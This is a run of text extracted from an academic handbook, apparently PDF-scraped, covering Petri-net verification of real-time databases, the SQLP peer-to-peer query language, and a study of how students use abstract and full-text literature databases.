1999). The basic idea behind occurrence graphs is to make a directed graph with a node for each reachable marking and an arc for each occurring binding element. OGs are directed graphs that have a node for each reachable marking and an arc for each binding element. An arc binding the marking node that the binding element associated occurs at each marking node resultant of occurrence (Jensen, 1998). The OG has a large number of built-in standard queries, such as Reachable, which determines whether there is an occurrence sequence between two specified markings, and AllReachable, which determines whether all the reachable markings are reachable from each other. These queries can be used to investigate all the standard properties of a HCPN. In addition to the standard queries, there are a number of powerful search facilities allowing formulating nonstandard queries. The standard queries require no programming at all. The nonstandard queries usually require that 2-5 programming lines of quite straightforward ML code. Through an occurrence graph, it is possible to verify the properties inherent to the model. The occurrence graph tool allows obtaining reports with general properties about the model. These reports contain information about the graph and metaproperties that are utilities for comprehension of model behavior in HCPN. For instance: boundness properties, which supply the upper and lower limit of tokens that each net place can contain, besides marking limits for each place; liveness properties, which shown the markings and transitions that are dead (not precede none other marking) and which transitions are live (appear in some occurrence sequence started of the initial marking of the net). Occurrence graphs can be constructed with or without considering time or code segments. When an occurrence graph has been constructed using the design/CPN it can be analyzed in different ways. The easiest approach is to use the Save Report command to generate a standard
1029
A Formal Verification and Validation Approach for Real-Time Databases
report providing information about all standard CPN properties: • • • • •
Statistics: Size of occurrence graph Boundedness properties: Integer and multiset bounds for place instances Home properties: Home markings Liveness properties: Dead markings, dead/ live transition instances Fairness properties: Impartial/fair/just transition instances
To use the OG tool, the user simply enters the simulator and invokes the Enter Occ Graph command (in the file menu of design/CPN). This has a similar effect as Enter Simulator. It creates the occurrence graph code, that is, the ML code necessary to calculate, analyze, and draw occurrence graphs. Moreover, it creates a new menu, called Occ. This menu contains all the commands which are used to perform the calculation and drawing of occurrence graphs.
Generate a Message Sequence Chart (MSC) MSC is a graphical and textual language for the description and specification of the interactions
between system components. Message sequence charts may be used for requirement specification, simulation and validation, test-case specification and documentation of real-time systems. As illustrated in Figure 4, the MSC comprises the QoS functions, the transactions with its operations, and the RTDB. In this method, the use of MSC is primordial, since it is possible to verify the properties of real-time database by representing the transactions properties and data properties, both with temporal constraints. Also, it is possible to validate the behavior of objects, its relationships, and the situations where concurrent access to the RTDB occurs through the object operations. To generate the MSC, we use the “smc.sml” library of the design/CPN tool package.
Generate a Timing Diagram (TD) The design/CPN performance tool for facilitating simulation-based performance analysis of HCPN generates the timing diagram. In this context, performance analysis is based on the analysis of data extracted from a HCPN model during simulation. The Performance tool provides random number generators for a variety of probability distributions and high-level support for both data collection and for generating simulation output.
Figure 4. Description of message sequence chart
Transactions
Tim e
N egotiation Function
B egin N egotiation
Tim e
1030
Finish
D atabase
Q oS Functions S pecification/ M apping M apping/ M onitoration
Tim e
Tim e
A Formal Verification and Validation Approach for Real-Time Databases
The random number generators can be used to create more accurate models by modeling certain probability distribution aspects of a system, while the data collection facilities can extract relevant data from a CPN model. Before data can be collected from a HCPN model, it is necessary to generate the performance code, that is, the ML code that is used to extract data from the HCPN model. The design/CPN performance tool can then be used to generate performance reports as a time diagram.
steady temperature is described. The upper and lower bound for temperature is defined. Sensors are placed in the environment with the objective of acquiring and storing the temperature values. Periodically, data stored in the sensors are sent to a real-time database server, through sensors transactions. The data obtained has temporal validity and the transactions have a deadline. The server is updated in order to allow historical queries. The architecture of the case study is illustrated in Figure 5.
Case Study: Real-Time Database for Sensor Networks
Applying the Proposed Method Building the Object Model
Case Study Overview According to the steps defined to obtain the object model, we have:
A sensor network is considered as application domain to the case study, where the method proposed is applied. For this case study, a scenario where the environment monitored must have a
1.
Identification of the objects: The objects identified in the model are the sensors BD-
Figure 5. Architecture of the sensor network case study Clock (Real-Time Constraints) Operator' s Console
CTL or CTI
BDSensor_RT1
Negotiation Function D
CTH
Transactions Management
AT AT
AT
X:(value,avi, timestamp, sensor) ir
X:(Tp,Qtde,Avi Tsp,Imp,Milr)
e t
BDSensor_RT2
BDWarehousing Negotiation Function
Negotiation Function
AT
X:(value,avi, timestamp, sensor) Controlling System
Controlled System
1031
A Formal Verification and Validation Approach for Real-Time Databases
2.
3.
Sensor_RT1 and BDSensor_RT2, and the real-time database server, called BDWarehousing. Identification of relationships among objects: The sensors send data to the server through transactions. Each sensor updates the server, while the server is updated by various sensors. Addition of attributes to objects: The data item X acquired by the sensor is composed of the following attributes: Value is the content of data item; avi is the absolute validate interval; timestamp is the late update time; and sensor identifies which sensor acquired the data. The attributes of the data item stored in the real-time database server has the fields: Tp, which is the data item processed; Qtde, which is the value that will be updated in the server; Avi, which is the absolute validate interval; Tsp, which is the late update time; sensor, which identifies the
4.
5.
6.
sensor that acquired the data; Imp, which is the accumulated imprecision; and Milr, which is the limit of Imp. Use of generalization to observe similarities and differences: This step is unnecessary for this model, due to existence of only two objects. Identification of operations: The sensors aim at acquiring data of the external environment (method AT) and these data can be read by long and snapshot queries (method CTL and method CTI, respectively). Long queries are performed in a time interval, and snapshot queries are performed in an absolute time. The real-time database server has historical data obtained by sensors (method AT), and allows one to query this historical data (method CTH). Identification of concurrent operations: The BDSensor_RT1 and BDSensor_RT2 object has two negotiation functions that
Figure 6. Object model BDSensor_RT1 and BDSensor_RT2 ATTRIBUTES X:value*avi*timestamp*sensor value: integer avi: time Timestamp (tsp): time sensor: string METHODS AT() Acquire Temperature CTL() Long Query CTI() Snapshot Query NEGOTIATION FUNCTION
BDWAREHOUSING ATTRIBUTES X:Tp*Qtde*Avi*Tsp*Imp*Milr Tp: characters avi: time Tsp: time Imp: integer Milr: integer METHODS AT() Acquire Temperature CTH() Historical Query NEGOTIATION FUNCTION
(CT I( ) AT( NOVO)) = ((now-X.tsp)
•
•
VHu(C1)= { v | v є viewpoint(u,T): v є community(C_NAME,u) } A radius of a certain number of hops dictates the peers of interest (C1: HOPS θ value, with θ є { = ,,≥ }) VHu (C1)= { v | v є viewpoint(u,T ): distance(u,v) θ value, with θ є { = ,,≥ }} A set of peer ids, that is, a set of specifically requested peers, determines the peers of interest (C1: PEERS={peer1, peer2, …., peern }) VHu(C1)= { v | v є viewpoint(u,T): v є {peer1, peer2, …., peern }} All the necessary information for the evaluation of any of the aforementioned atomic conditions is found in the system catalog of u. Quality of service: The clauses concerning the AVAILABILITY and RESPONSE TIME of the peers of interest aim to guarantee a certain level of quality of service for the peer posing a query. CLASS: It is possible that we only need to query the peers of a certain class. Classes carry both structural typing information (as they statically define the interface of their instances), but also semantic information (as collections of semantically—therefore structurally—similar instances). In SQLP, it is easy to specify an atomic condition that restricts the peers of interest to a certain class, by giving a condition of the form C4: CLASS = class_name. Assuming VCu(C4) the result set of peers of interest, and class(v) a function that returns the class of each peer from the system catalog of the querying peer, the resulting set of peers of interest is formally defined as: VCu(C4) = { v | v ∈ viewpoint(u,T): class(v) = class_name }
1855
Context-Aware Query Processing in Ad-Hoc Environments of Peers
•
AGE: Apart from the constraining of peers where their properties are taken as criteria for their inclusion in the resulting set of peers of interest, we can perform some form of caching in the extents of the collected tuples for virtual or hybrid relations. In other words, assuming that a peer is frequently queried, it is not obligatory to pay the price of invoking its Web service operations, executing the data transformation workflow and materializing the same results again and again, but rather, it is resource efficient to cache its previous results. The AGE clause of SQLP provides the possibility of specifying a maximum caching age for incoming tuples in a virtual/hybrid relation. Query Timing: Having clarified the general • mechanism for the determination of peers of interest, we move on to provide the specification for the timing of queries. Fundamentally, we have two modes of operation: ad hoc or continuous. Each mode has its own tuning parameters: If the query is continuous, this means • that the user is continuously notified on the status of the query result. • If the query is ad hoc, the query eventually has to terminate. Differently from traditional query processing (which operates on finite sets of always available, locally stored tuples), we need to tune the conditions that signify termination of a query that has been late to complete its operation, either due to peer failures, or the size of the peer’s graph. To capture these exceptions, we can terminate a query upon (a) the completion of a timeout period of execution, (b) the materialization of a certain amount of tuples that the user judges as satisfactory for his information, or (c) the collection of responses from a certain percentage of peers that were initially contacted. In all these cases, the execution of the
1856
workflows whose results have not been materialized is interrupted, the rest of the query is executed as usual and the user is presented with a partial—still, non-empty—answer.
Query Execution At this point we can describe the exact set of steps for executing a query. Suppose that at random time T, a query Q is performed by node u. Let {R1, R2, …., Rn} be the relations involved in query Q. Then the query can be written in the form: Q(R1, R2, …., Rn). We can assume that the relations R1, R2, …., Rk, with k ≤n are virtual or hybrid, without any impact on the generality. All tables R1, R2, …., Rk must be filled with tuples. The procedure is the same for all tables; therefore we will present it only for table R1. The first step is to determine the set of target peers for node u that performs the query (Vu(C)), by evaluating C over the set of peers belonging the viewpoint of u (viewpoint(u)). C comprises of the conditions located at the clauses AGE, HORIZON, AVAILABILITY, RESPONSE_TIME and CLASS. Let Vu(C) = { u1, u2, ...., um }. For each node of u V (C) the appropriate Web services are invoked in order to require the appropriate tuples. Let also wfu. R1 (u1), wfu.R1(u2), …., wfu.R1(um), be the appropriate workflows of the peers belonging to Vu(C). The schema of each workflow is matched to the schema of relation R1, which is the target relation. In the following, the clause TIMING is evaluated to determine the execution mode of the query (continuous or ad hoc) and the completion condition of the query. The next step is to attempt the execution of wfu.R1(ui) and then perform a full or partial materialization of R1, which is located in u, according to the query completion condition, which was mentioned before. Table R1 is populated with the appropriate tuples and is ready to be queried. The same procedure is performed for all other virtual or hybrid tables. Therefore all tables
Context-Aware Query Processing in Ad-Hoc Environments of Peers
of u are ready to be queried. At this point the query of u is performed over tables R1, R2, …., Rn based on traditional database methodology.
Examples In the rest of this section, we will present examples of SQLP. Assume a peer network of the topology of Figure 5, consisting of 5 peers, each representing a car in the highway. Queries are posed to peer p1, that classifies the rest of the peers in two communities, (a) the community of dark-shaded close peers (Distance_Under_5km) and (b) the community of light-shaded, distant peers (Distance_Over_5km). Peer p1 is informed on the existence and connectivity of the rest of the peers through the underlying routing protocol that operates as a black box in our setting. Peer p1 carries a database consisting of two relations with the following schemata: CARS(ID, PLATE, BRAND, VEL) BRANDS(BRAND, COUNTRY, METRIC_SYSTEM) The first relation describes the information collected from the peers contacted (and mainly serves queries about the velocity of the cars in the context of the querying peer). This relation CARS is virtual: each time a query is posed, tuples must be collected from the context of peer p1 to
populate it. The attribute BRAND is a foreign key to the relation BRANDS that is static and locally stored. Primary keys are underlined and the semantics of the attributes are the obvious ones. In the sequel, we give examples of SQLP queries over the abovementioned environment.
Example 1 By this example we illustrate different situations where we can determine the peer nodes to which the query is addressed. Different strategies may be used for choosing the peers to query. In any case the decision is based on characteristics of the peers such as availability, response time, class of Web services implemented, and so forth. Peer p1 wishes to know the license number, velocity and manufacturing country of all cars belonging to its community. Furthermore, the peer that poses the query wishes to limit it to those peers that: (a) are located no more than 5 Km away (Distance_Under_5km), (b) their availability is more than 60%, (c) their response time is less than 4 seconds and finally, (d) implement the European class of Web services. The syntax of the examined query is depicted in Figure 6.
Example 2 Peer p1 wishes to know the license number, velocity and manufacturing country of all cars. The
Figure 5. Graph configuration for query posing Distance_under_5km
Distance_Over_5km 3
1
4
5
2
1857
Context-Aware Query Processing in Ad-Hoc Environments of Peers
Figure 6. Query 1
SELECT CARS.PLATE,CARS.VEL,BRANDS.COUNTRY FROM CARS, BRANDS WHERE CARS.BRAND=BRANDS.BRAND WITH COMMUNITY Distance_Under_5km AND HORIZON AVAILABILITY > 60% AND RESPONSE_TIME < 4.0 AND = ‘european’ CLASS
Context-Aware Query Processing in Ad-Hoc Environments of Peers
peer also wishes to complete the query when more than 70% percent of the target peers have replies successfully (Figure 7). To determine the target peers, the requesting peer selects the peers based on its catalog and according to their response time. The execution of the query stops when the requested percentage of 70% in our case is satisfied.
Example 3 Peer p1 wishes to know the license number, velocity and manufacturing country of all cars. The peer also wishes to complete the query when more than 5 tuples have been collected for the relation CARS (Figure 8). The requesting peer contacts each peer that appears in its catalog. This procedure ends when the count of currently collected tuples becomes greater or equal to the posed limit.
Example 4 Peer p1 wishes to know the license number, velocity and manufacturing country of all cars. The peer also wishes to complete the query within a timeout of 7 seconds (Figure 9). The requesting peer contacts each peer that appears in its catalog. This procedure ends when the timeout is reached.
QUERY PROCESSING FOR SQLP QUERIES In this section, we deal with the problem of mapping the declarative SQLP queries to executable query plans. As already mentioned, the execution of traditional SQL queries relies on their mapping to left-deep trees whose leaves are database relations, internal nodes are operators of the relational algebra and edges signify pipeline of the results of a node to another. Clearly, since we raise fun-
damental assumptions of traditional database querying, such as the finiteness and locality of tuples as well as the conditions under which a query terminates, we need to extend both the set of operators that take part in a query and the way the query tree is constructed. In this section, we start by introducing the novel operators for query processing. Next, we discuss how we algorithmically determine the set of peers of interest and, finally, we discuss the execution of a query.
Novel Operators In this subsection, we start with the operators that participate in SQLP query plans. We directly adopt the Project, Select, Group, Order, Union, Intersection, Difference and Join operators from traditional relational algebra and move on to define new operators. First, we discuss operators that are used to construct the set of peers of interest. Then, we present the operators that actually take part in a query plan. •
Operators applicable to the catalog of a peer: • Check_Tables: Operator Check_Tables determines whether the tables belonging to the FROM clause of a query are virtual, hybrid or local. The input to the operator is the FROM clause of the query and the output is the same list of tables, each annotated with the category to which it belongs. Check_Peers: This is a composite • operator that applies the procedure mentioned in the second section for the determination of a set of peers out of a condition in disjunctive normal form. All clauses of the form HORIZON, AVAILABILITY, RESPONSE_TIME and CLASS are evaluated over the catalog through a Check_Peers operator and the set
1859
Context-Aware Query Processing in Ad-Hoc Environments of Peers
•
1860
of peers of interest is determined by combining the results of these operators through the appropriate Unions and Intersections. Check_Age: The Check_Age operator • is also an operator used to determine the set of peers of interest. For each relation that hosts transaction time and producing peer attributes, an invocation of the Check_Age operator scans the extent of the relation, and identifies the appropriate tuples and their peers. The output is passed to the appropriate Difference operator that subtracts the identified peers from the previously determined set of peers of interest. Operators that participate in query plans: Call_WS: This operator is responsible • for dynamically determining which Web service operation, over which port type, of a specific peer must be invoked. Each Web service of a peer to be invoked is practically wrapped by this operator. The result is collected and forwarded to the operator managing the execution of a workflow of Web services. Wrapper_Pop: This operator is used • in order to support the monitoring and execution of the workflow of Web services that populate a virtual or hybrid table. For each peer contacted in order to populate a certain virtual/hybrid relation, a Wrapper_Pop operator is introduced. Once the final XML result has been computed, its tuples are transformed to the schema of the target relation. Fill: A Fill operator is introduced for • each virtual relation. The operator takes as input all the results of the underlying Wrapper_Pop operators (one for each peer of interest) and co-
•
ordinates their materialization. Also, Fill checks the necessary conditions concerning the timing and termination of the query and, whenever termination is required, it signals its populating operators appropriately. ExAg (Execute Again): This operator is useful only in continuous queries and practically restarts query execution whenever the query period is completed.
Construction of the Query Tree In this paragraph we discuss a simple algorithm to generate the tree of the query plan. Assume that a query is posed to peer p1 and its viewpoint comprises n peers, specifically p1, p2, ..., pn. The algorithm for the construction of the query tree is a bottom up algorithm that builds the tree from the leaves to the top and is described as follows: 1.
2.
3.
4.
We discover the virtual or hybrid relations that participate in the query. A specific subtree will be constructed for each of them. We determine the set of peers of interest. For each peer that participates in the population of a certain relation, the leaves of the respective sub-tree are nodes representing the peer to be contacted. To keep the tree-like form of the plan, each peer can be replicated in each sub-tree to which it participates; nevertheless, each peer can also be modeled by a single node without any significant impact to the execution of the query. We introduce a Wrapper_Pop for each peer that coordinates all the Call_WS operators that pertain to the operations of the peer. Between the peer node and the Wrapper_ Pop, we introduce the appropriate Call_WS operators. For each virtual or hybrid relations we introduce a Fill operator that combines the output of all the respective Wrapper_Pop
Context-Aware Query Processing in Ad-Hoc Environments of Peers
5.
6.
operators; therefore it is their immediate ancestor. Having introduced the Fill operators, the virtual or hybrid relations can be materialized and act as local ones. Therefore, the rest of the query tree is built as in traditional query processing. If the query is continuous, we add an appropriate ExAg operator at the top.
1. 2.
3.
Execution of a Query though the Query Tree The execution of the query follows a simple strategy. First, we materialize the virtual/hybrid relations. Then, we execute the query as usual. Clearly, although this is not the best possible strategy for all cases (especially when only nonblocking operators are involved), we find that performing further optimizations is an orthogonal problem, already dealt in the context of blocking operators for streaming data (Babcock et al., 2002). Therefore, in this article we consider only this baseline strategy since all relevant results can directly be introduced in the optimizer module of a peer. Specifically, the set of steps to follow for the execution of the query are:
All the Call_WS operators are activated and the appropriate services are invoked. The Wrapper_Pop operators collect the incoming XML results and queue them towards the appropriate Fill operators that further push them towards the extents of the relations in the hard disk. This is performed in a pipelined fashion. Once all virtual/hybrid relations have been materialized, the rest of the query plan is a traditional left-deep tree that executes as usual.
Example In the following, we discuss the construction of the query plan for the query of Figure 10. 1.
2.
Step 1: The query involves two tables, CARS and BRANDS. The application of the operator CHECK_TABLES over the two relations results in the determination that the first is a hybrid one and the second a locally stored one. Step 2: The operator CHECK_PEERS is applied to the catalog of peer p1, in order to determine the peers of interest of the query.
Figure 10. Query for which the plan is to be constructed
SELECT CARS.PLATE,CARS.VEL,BRANDS.COUNTRY FROM CARS, BRANDS WHERE CARS.BRAND=BRANDS.BRAND WITH AGE < 5 AND HORIZON COMMUNITY DISTANCE_UNDER_5KM AND TIMING CONTINUOUS PULL_BASED_PERIOD = 7 AND > 60% AND AVAILABILITY RESPONSE_TIME < 3.0 AND CLASS = ‘european’
1861
Context-Aware Query Processing in Ad-Hoc Environments of Peers
Taking into consideration the age of tuples found in relation CARS and the system catalog, the peer p1 decides that the peers of interest are peers 2 and 8.
3. 4.
Step 3: The operator CALL_WS is applied over each peer of interest. Step 4: For each peer over which a CALL_WS is applied, we apply the operator WRAP-
Figure 11. Query plan for the aforementioned query of Figure 10
Figure 12. System architecture Client side Query
Parser
Query Optimizer
Query Results
Server side
System Catalog
Application Server
Query Execution Catalog Update
Local DB
1862
= Web Service Operation
Context-Aware Query Processing in Ad-Hoc Environments of Peers
5. 6.
PER_POP to coordinate the execution of its operations. Step 5: The operator FILL is applied for the result of each WRAPPER_POP. Step 6: The rest of the query plan is constructed as usual, with the only difference that the sub-tree of relation CARS is the one constructed in the previous steps.
IMPLEMENTATION Figure 12 shows the full-blown architecture required to support our approach for contextaware query processing in ad hoc environments of peers. The elements shown in the figure are divided with respect to the client and the server roles played by peers. To play the client role, a peer comprises a traditional query processing architecture, involving a parser, an optimizer and a query processor. A local database and the system catalog complement the ingredients of the client part of a peer. Playing the server role amounts in publishing a set of Web services, hosted by an application server, which is responsible for their proper execution. As usual, whenever a query is posed, the parser is the first module that is fired. The optimizer produces alternative plans out of which the best, with respect to a given cost model, is chosen. The query execution engine executes the query over the local database and returns the results. Our first prototype implementation does not currently support the query optimizer subsystem. Instead, standard query plans are produced after parsing the user queries. The query execution subsystem includes a mechanism that allows visualizing the aforementioned plans. Figure 11 gives a visualized execution plan through the Yed tool that graphically presents graphs. Populating and updating the contents of the system catalog is done either statically, or dynamically. In the former case, the peer is responsible for updating the catalog through a catalog-specific
API. The static update of the catalog takes advantage of the possible availability of peer-specific dynamic service discovery mechanisms. Such mechanisms may be exploited by the peer itself which takes further charge of updating the catalog accordingly. The dynamic catalog update is realized by the catalog update subsystem, which relies on WSAMI, a middleware platform for mobile Web services (Issarny et al., 2005). WSAMI provides the naming & directory service that allows the dynamic discovery of Web services provided in mobile computing environments. Specifically, WSAMI is based on an SLP server – that is, an implementation of the standard SLP (http://www. openslp.com) protocol-- for the discovery of networked entities in mobile computing environments.
RELATED WORK The work that is closely related with the proposed approach for context-aware query processing over ad hoc environments of peers can be categorized into work concerning the fundamentals of heterogeneous database systems, context-aware computing and approaches that specifically focus on context-aware service-oriented computing. The prominent approaches that fall in the aforementioned categories are briefly summarized in the remainder of this section.
Heterogeneous Database Systems Our approach for querying of ad hoc environments of peers bears some similarity with the traditional wrapper-mediator architectures used in heterogeneous database systems (Roth & Schwarz, 1997; Haas et al., 1997). Such systems consist of a number of heterogeneous data sources. The user of the system has the illusion of a homogeneous data schema, which is actually realized by the wrapper-mediator architecture.
1863
Context-Aware Query Processing in Ad-Hoc Environments of Peers
In particular, each data source is associated with a wrapper. The wrapper encapsulates the data source under a well-defined interface that allows executing queries. Each user query is translated by the mediator into data source specific queries, executed by corresponding wrappers. As opposed to traditional heterogeneous database systems, in the environments we examine the roles of users and data sources are not discrete. Each peer is a heterogeneous data source offering information to other peers that play the role of the user. Therefore, each peer may eventually serve as a data source and a user issuing queries. Analogous to the wrapper elements in our case is the Web services that give access to peers playing the role of data sources. Analogous to the mediator element is the hybrid relation mapping procedure that executes workflows on Web services. In simple words, a traditional heterogeneous database system is a “1 mediator to N wrappers architecture.” An ad hoc environment of peers in our case is an “N mediator to N wrappers architecture.” Another fundamental difference between the environments we examine and traditional heterogeneous database systems is that in our case the cardinality and the contents of the set of data sources may constantly change.
we do not assume centralized information management and virtual relations are dynamically compiled.
Context-Aware Service-Oriented Computing In general, the integration of context-awareness and service-orientation just began to gain the attention of the corresponding research communities. In Keidl & Kemper (2004), for instance, the authors introduce ways for associating context to Web service invocations. In Maamar, Mostefaoui, & Mahmoud (2005) the authors go one step further by examining the problem of customizing Web service compositions with respect to contextual information. Web service execution is customized according to different types of context. Similarly, in Zahreddine & Mahmoud (2005) the authors propose a framework for dynamic context-aware service discovery and composition. Specifically, contextual information regarding the technical characteristics of user devices is used towards discovering services that match these characteristics.
CONCLUSION AND FUTURE WORK Context-Aware Computing and Infrastructures In Dey (2001), context is defined as any information that can be used to characterize the interaction between a user and an application, including the user and the application. Several middleware infrastructures follow this definition toward enabling context reasoning and management (Fahy & Clarke, 2004; Chen, Finin, & Joshi, 2003; Chan & Chuang, 2003; Capra, Emmerich, & Mascolo, 2003; Gu, Pung, & Zhang, 2005; Roman et al., 2002). Amongst these approaches, CASS (Fahy & Clarke, 2004) bears some similarity with our approach, since context is modeled in terms of a relational data model. However, in our approach
1864
In this article, we have dealt with context-aware query processing in ad-hoc peer-to-peer networks. Each peer in such an environment has a database over which users want to execute queries. This database involves (a) relations which are locally stored and (b) relations which are virtual or hybrid. In the case of virtual relations, all the tuples of the relation are collected from peers that are present in the network at the time when the query is posed. Hybrid relations involve both locally stored tuples and tuples collected from the network. The collaboration among peers is performed through Web services. The integration of the external data, before they are locally collected to a peer’s database, is performed though
Context-Aware Query Processing in Ad-Hoc Environments of Peers
a workflow of operations. We do not perform query processing in the traditional way, but rather, we involve context-aware query processing techniques that exploit the neighborhood of each peer and the Web service infrastructure that deals with the heterogeneity of peers. In this setting, we have formally defined the system model for SQLP, an extension of traditional SQL on the basis of contextual environment requirements that concern the termination of queries, the failure of individual peers and the semantic characteristics of the peers of the network. We have precisely defined the semantics of the language SQLP. We have also discussed issues of data integration, performed through workflows of Web services. Moreover, we have presented an initial query execution algorithm as well as the typical definition of all the operators that can take place in a query execution plan. A prototype implementation that is implemented is also discussed.
ACKNOWLEDGMENT This research is co-funded by the European Union - European Social Fund (ESF) & National Sources, in the framework of the program “Pythagoras II” of the “Operational Program for Education and Initial Vocational Training” of the 3rd Community Support Framework of the Hellenic Ministry of Education.
REFERENCES Abolhasan, M., Wysocki, T., & Dutkiewicz, E. (2004). A review of routing protocols for mobile ad hoc networks. Ad Hoc Networks, 2, 1-22. Androutsellis-Theotokis, S., & Spinellis, D. (2004). A survey of peer-to-peer content distribution technologies. ACM Computing Surveys, 36(4), 335-371.
Babcock, B., Babu, S., Datar, M., Motwani, R., & Widom, J. (2002, June). Models and issues in data stream systems. In Proceedings of the 21st ACM SIGACT-SIGMOD-SIGART Symposium on Principles of Database Systems (PODS’02) (pp. 1-16). Capra, L., Emmerich, W., & Mascolo, C. (2003). CARISMA: Context - Aware Reflective Middleware System for Mobile Applications. IEEE Transactions on Software Engineering, 29(10), 929-945. Chan, A.T., & Chuang, S.-N. (2003). MobiPADS: A reflective middleware for context-aware mobile computing. IEEE Transactions on Software Engineering, 29(10), 1072-1085. Chen, H., Finin, T., & Joshi, A. (2003). An ontology for context-aware pervasive computing systems. Knowledge Engineering Review, 18(3), 197-207. Chlamtac, I., Conti, M., & Liu, J. J.-N. (2003). Mobile ad hoc networking: Imperatives and challenges. Ad Hoc Networks, 1(1), 13-64. Dey, A.K. (2001). Understanding and using context. Personal and Ubiquitous Computing, 5(1), 4-7. Fahy, P., & Clarke, S. (2004, June). CASS - Middleware for mobile context-aware applications. In Proceedings of the 2nd ACM SIGMOBILE International Conference on Mobile Systems, Applications and Services (MobiSys’04). Gu, T., Pung, H.-K., & Zhang, D.-Q. (2005). A service-oriented middleware for building contextaware services. Journal of Network and Computer Applications, 28, 1-18. Haas, L.M., Kossmann, D., Wimmers, E.L., & Yang, J. (1997, August). Optimizing queries across diverse data sources. In Proceedings of 23rd International Conference on Very Large Data Bases (VLDB’97) (pp. 276-285).
1865
Context-Aware Query Processing in Ad-Hoc Environments of Peers
Issarny, V., Sacchetti, D., Tartanoglou, F., Sailhan, F., Chibout, R., Levy, N., & Talamona, A. (2005). Developing ambient intelligence systems: A solution based on Web services. Journal of Automated Software Engineering, 12(1), 101-137. Keidl, M., & Kemper, A. (2004, March). A framework for context-aware adaptable Web services. In Proceedings of 9th International Conference on Extending Database Technology (EDBT ‘04) (pp. 826-829). Maamar, Z., Mostefaoui, S., & Mahmoud, Q. (2005, January). Context for personalized Web services. In Proceedings of 38th IEEE Hawaii International Conference on System Sciences (HICSS’05) (pp. 166.2). Madhavan, J., Bernstein, P.A., Doan, A., & Halevy, A.Y. (2005, April). Corpus-based schema matching. In Proceedings of the 21st International Conference on Data Engineering (ICDE 2005) (pp. 57-68).
Ozsu, T., & Valduriez, P. (1991). Principles of distributed database systems. Prentice-Hall. Roman, M., Hess, C.K., Cerqueira, R., Ranganathan, A., Campbell, R.H., & Nahrstedt, K. (2002). Gaia: A middleware infrastructure to enable active spaces. IEEE Pervasive Computing, 1(4), 74-83. Roth, M.T., & Schwarz, P.M. (1997, August). Don’t scrap it, wrap it! A wrapper architecture for legacy data sources. In Proceedings of 23rd International Conference on Very Large Data Bases (VLDB’97) (pp. 266-275). Zahreddine, W., & Mahmoud, Q.H. (2005, March). An agent-based approach to composite mobile Web services. In Proceedings of 19th International Conference on Advanced Information Networking and Applications (AINA 2005) (pp. 189-192).
This work was previously published in the Journal of Electronic Commerce in Organizations, edited by M. Khosrow-Pour, Volume 6, Issue 1, pp. 62-88, copyright 2008 by IGI Publishing, formerly known as Idea Group Publishing (an imprint of IGI Global).
1866
1867
Chapter 5.16
Misuse of Online Databases for Literature Searches Robert A. Bartsch University of Houston–Clear Lake, USA
ABSTRACT
INTRODUCTION
Online library databases are the primary method for finding relevant literature in many fields. These databases either primarily have abstracts or have the entire article online (i.e., full-text). This chapter describes how students use and misuse abstract and full-text databases when conducting literature searches. Findings from two studies indicate (1) students overestimate the usefulness of full-text databases, (2) students do not know which type of database is the best tool for a particular situation, and (3) students favor technology that is easier for them to use. By understanding the implications of these findings, it is hoped instructors can create lectures and assignments that increase students’ information literacy levels. Additionally, this chapter provides an example of how people, in general, will use new technology that is easier but is not necessarily more useful.
Instructional technology has been a benefit to students, allowing them to access more information more quickly. There is no question students use the available technology such as the World Wide Web; however, there is a question as to whether students use it well. This chapter highlights examples of when students do not use instructional technology well and the importance of proper education about instructional technology. Specifically, this chapter focuses on online literature search databases (e.g., PsycINFO, ERIC) that are used in college and university libraries across the country. This chapter describes two studies that examine whether students properly use this instructional technology. These studies provide recommendations to instructors and college librarians about online databases, and more importantly, these studies illustrate some
Misuse of Online Databases for Literature Searches
problems that students and others can have in using instructional technology.
BACKGROUND There are two main types of online literature search databases: abstract and full-text. In abstract databases, abstracts are available for almost all articles in a discipline, and some, but not all, may also be available as full-text documents. In fulltext databases, the database is composed entirely of full-text articles; however, the database is likely to be limited. In fact, the highest reported percentage of relevant articles from a discipline appearing in a full-text database is only 46% (Chapman, 2001) and many are less than 10% (Carlson, 2001; Herring, 2001). Not surprisingly, students have an affinity to use full-text databases because articles may be printed while at a computer, possibly at home. Whereas with abstract databases, the students have to physically locate and copy the article in the library or complete an interlibrary loan request and wait days or weeks for the article. Many teachers complain students use full-text databases too much and ignore abstract databases (e.g., Carlson, 2001; Herlily, 2000; Littrell, 2000). One survey (MacDonald & Dunkelberger, 2000) found some students exclusively used full-text databases. By only using full-text databases, many instructors believe students will miss important references. In addition, instructors may worry that solely using full-text databases can lead to beliefs that literature reviews are very easy and articles from full-text databases are equal to if not superior to other articles (Laskowski, 2002). The technology acceptance model (TAM) predicts user acceptance of new technology (Davis, 1989). TAM is based on the social psychological theory of reasoned action (Azjen & Fishbein,
1868
1980), which predicts behavior in general. According to TAM, user acceptance is predicted by two main factors: perceived usefulness and perceived ease of use. Usefulness is defined as “the degree to which a person believes that using a particular system would enhance his or her job performance” (Davis, 1989, p. 320), and ease of use is defined as “the degree to which a person believes that using a particular system would be free of effort (Davis, 1989, p. 320). In terms of literature search databases, usefulness relates directly to the number of articles that are available. Abstract databases are therefore more useful because they are more complete. Ease use is determined by how quickly and easily a person can obtain articles. Given search functions are similar between abstract and full-text databases, full-text databases are easier to use because of the speed in obtaining copies of articles. In addition, some researchers have included in TAM subjective norms (i.e., what important others think of the technology) as another predictor of user acceptance (Venketesh & Morris, 2000). Many teachers provide norms favoring abstract databases for large literature assignments but these expectations may be poorly communicated. It is easy to predict full-text databases will be rated higher in ease of use, and previous studies have indicated full-text databases will have higher levels of user acceptance (MacDonald et al., 2000). However, it is not as clear whether students will perceive abstract or full-text databases to be more useful. Students may recognize abstract databases by being more complete, are more useful. On the other hand, students may assume full-text databases are more useful because it is the technology they favor. Actually, the usefulness of abstract vs. fulltext databases depends on the type of assignment. For example, full-text databases would be just as useful for an assignment to find a single article
Misuse of Online Databases for Literature Searches
